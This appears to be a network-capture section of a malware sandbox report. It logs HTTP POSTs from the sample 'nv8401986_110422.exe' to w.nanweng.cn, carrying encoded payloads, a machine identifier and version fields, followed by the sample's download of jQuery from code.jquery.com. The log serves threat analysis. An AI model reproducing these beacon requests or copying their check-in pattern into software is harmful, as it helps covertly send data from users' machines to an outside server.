                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.676662922 CET331OUTData Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        9192.168.2.54993747.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.742341995 CET223OUTPOST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:26:43.743345976 CET13OUTData Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        10192.168.2.55002847.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:26:59.427057981 CET370OUTPOST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        11192.168.2.55002947.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:27:03.054822922 CET370OUTPOST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        12192.168.2.55003047.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:27:06.676209927 CET370OUTPOST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        13192.168.2.55003147.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.301943064 CET370OUTPOST /qy/ov HTTP/1.1
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Content-Length: 186
                                                                                                                                                                                                        Connection:close
                                                                                                                                                                                                        Accept-Language: zh-cn
                                                                                                                                                                                                        Cache-Conbtrol:no-cache
                                                                                                                                                                                                        Content-Type:application/x-www-form-urlencoded
                                                                                                                                                                                                        Data Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a
                                                                                                                                                                                                        Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        14192.168.2.55003247.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.430201054 CET223OUTPOST /qy/rq HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 504
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:27:10.430227995 CET504OUTData Raw: 26 69 6e 66 3d 7b 22 61 62 22 3a 30 2c 22 61 70 70 69 64 22 3a 31 2c 22 61 76 6c 74 22 3a 6e 75 6c 6c 2c 22 61 76 73 22 3a 30 2c 22 62 63 6c 6b 22 3a 30 2c 22 62 70 22 3a 30 2c 22 63 69 64 22 3a 30 2c 22 63 6b 77 22 3a 22 22 2c 22 63 6c 72 22 3a
                                                                                                                                                                                                        Data Ascii: &inf={"ab":0,"appid":1,"avlt":null,"avs":0,"bclk":0,"bp":0,"cid":0,"ckw":"","clr":0,"cont":0,"conw":0,"ddr":0,"dlr":0,"etrc":20,"etrc2":0,"fre":0,"frr":0,"fs":0,"gqp":0,"kspdf":0,"kspic":0,"kszip":0,"lbc":0,"lbcr":0,"mbp":0,"md":0,"md5":"31549


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        15192.168.2.55003347.103.45.1780768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.114681005 CET223OUTPOST /qy/lq HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 102
                                                                                                                                                                                                        Host: w.nanweng.cn
                                                                                                                                                                                                        Jan 3, 2025 15:27:22.114716053 CET102OUTData Raw: 6c 71 3d 7b 22 61 70 70 69 64 22 3a 31 2c 22 62 33 22 3a 30 2c 22 62 33 64 22 3a 30 2c 22 62 33 69 22 3a 30 2c 22 62 71 22 3a 30 2c 22 62 71 64 22 3a 30 2c 22 62 71 69 22 3a 30 2c 22 75 69 64 22 3a 22 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30
                                                                                                                                                                                                        Data Ascii: lq={"appid":1,"b3":0,"b3d":0,"b3i":0,"bq":0,"bqd":0,"bqi":0,"uid":"102e1490f0604c078f675cf9899bc6e6"}


                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.549727151.101.194.137443768C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC358OUTGET /jquery-3.6.3.min.js HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Referer: https://www.msn.com/?ocid=iehp
                                                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                        Host: code.jquery.com
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 89947
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                        ETag: "28feccc0-15f5b"
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 881384
                                                                                                                                                                                                        Date: Fri, 03 Jan 2025 14:26:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-lga21985-LGA, cache-nyc-kteb1890074-NYC
                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                        X-Cache-Hits: 1329, 0
                                                                                                                                                                                                        X-Timer: S1735914361.769254,VS0,VE1
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 33 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                        Data Ascii: /*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 45 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 45 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 45 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=E.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return E.each(this,e)},map:function(n){return this.pushStack(E.map(this,f
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 79 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 76 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 45 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 69 66 28 64 2e 63 73 73 53 75 70 70 6f 72 74 73 53 65 6c 65 63 74 6f 72 26 26 21 43 53 53 2e 73 75 70 70 6f 72 74 73 28 22 73 65 6c 65 63 74 6f
                                                                                                                                                                                                        Data Ascii: )){(f=ee.test(t)&&ve(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=E)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{if(d.cssSupportsSelector&&!CSS.supports("selecto
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 61 29 7b 72 65 74 75 72 6e 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e
                                                                                                                                                                                                        Data Ascii: "in e&&e.disabled===t}}function ye(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ve(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 53 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72 6e 20 6e 3f 5b 6e 5d 3a 5b 5d 7d 7d 29 3a 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65
                                                                                                                                                                                                        Data Ascii: ?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&S){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace
                                                                                                                                                                                                        2025-01-03 14:26:00 UTC1378INData Raw: 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 52 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 45 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 28 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22
                                                                                                                                                                                                        Data Ascii: [selected]").length||y.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+E+"-]").length||y.push("~="),(t=C.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||y.push("\\["+M+"*name"+M+"*="+M+"
